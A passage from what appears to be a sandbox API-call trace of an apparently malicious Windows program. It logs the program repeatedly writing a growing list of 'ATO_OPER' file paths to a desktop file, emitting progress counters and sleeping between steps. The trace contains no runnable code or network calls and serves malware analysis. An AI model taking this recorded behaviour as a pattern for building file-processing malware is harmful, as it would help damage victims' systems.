Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\n", cchWideChar=1044, lpMultiByteStr=0x1e99d58, cbMultiByte=1044, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\ns", lpUsedDefaultChar=0x0) returned 1044 [0207.122] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e99d58*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesWritten=0x2a1fe34*=0x414, lpOverlapped=0x0) returned 1 [0207.123] CloseHandle (hObject=0x1ec) returned 1 [0207.124] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0207.124] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0207.124] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0207.125] Sleep (dwMilliseconds=0x5dc) [0209.274] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0209.274] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0209.274] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0209.275] Sleep (dwMilliseconds=0x5dc) [0211.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0211.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=16 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0211.925] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0211.926] Sleep (dwMilliseconds=0x5dc) [0213.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0213.692] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\n", cchWideChar=1109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1109 [0213.692] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\n", cchWideChar=1109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1109 [0213.692] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\n", cchWideChar=1109, lpMultiByteStr=0x269cae8, cbMultiByte=1109, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\n\x03", lpUsedDefaultChar=0x0) returned 1109 [0213.693] WriteFile (in: hFile=0x20c, lpBuffer=0x269cae8*, nNumberOfBytesToWrite=0x455, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesWritten=0x2a1fe34*=0x455, lpOverlapped=0x0) returned 1 [0213.694] CloseHandle (hObject=0x20c) returned 1 [0213.694] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0213.694] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0213.694] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0213.695] Sleep (dwMilliseconds=0x5dc) [0215.624] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0215.624] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0215.624] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0215.801] Sleep (dwMilliseconds=0x5dc) [0217.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0217.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=17 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0217.307] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0217.308] Sleep (dwMilliseconds=0x5dc) [0219.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0219.764] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\n", cchWideChar=1179, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1179 [0219.764] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\n", cchWideChar=1179, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1179 [0219.764] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\n", cchWideChar=1179, lpMultiByteStr=0x29053f8, cbMultiByte=1179, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\n", lpUsedDefaultChar=0x0) returned 1179 [0219.764] WriteFile (in: hFile=0x1ec, lpBuffer=0x29053f8*, nNumberOfBytesToWrite=0x49b, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x29053f8*, lpNumberOfBytesWritten=0x2a1fe34*=0x49b, lpOverlapped=0x0) returned 1 [0219.766] CloseHandle (hObject=0x1ec) returned 1 [0219.767] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0219.767] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0219.767] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0219.768] Sleep (dwMilliseconds=0x5dc) [0221.825] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0221.825] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0221.826] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0221.827] Sleep (dwMilliseconds=0x5dc) [0224.014] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0224.014] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=18 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0224.015] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0224.015] Sleep (dwMilliseconds=0x5dc) [0226.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0226.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\n", cchWideChar=1247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 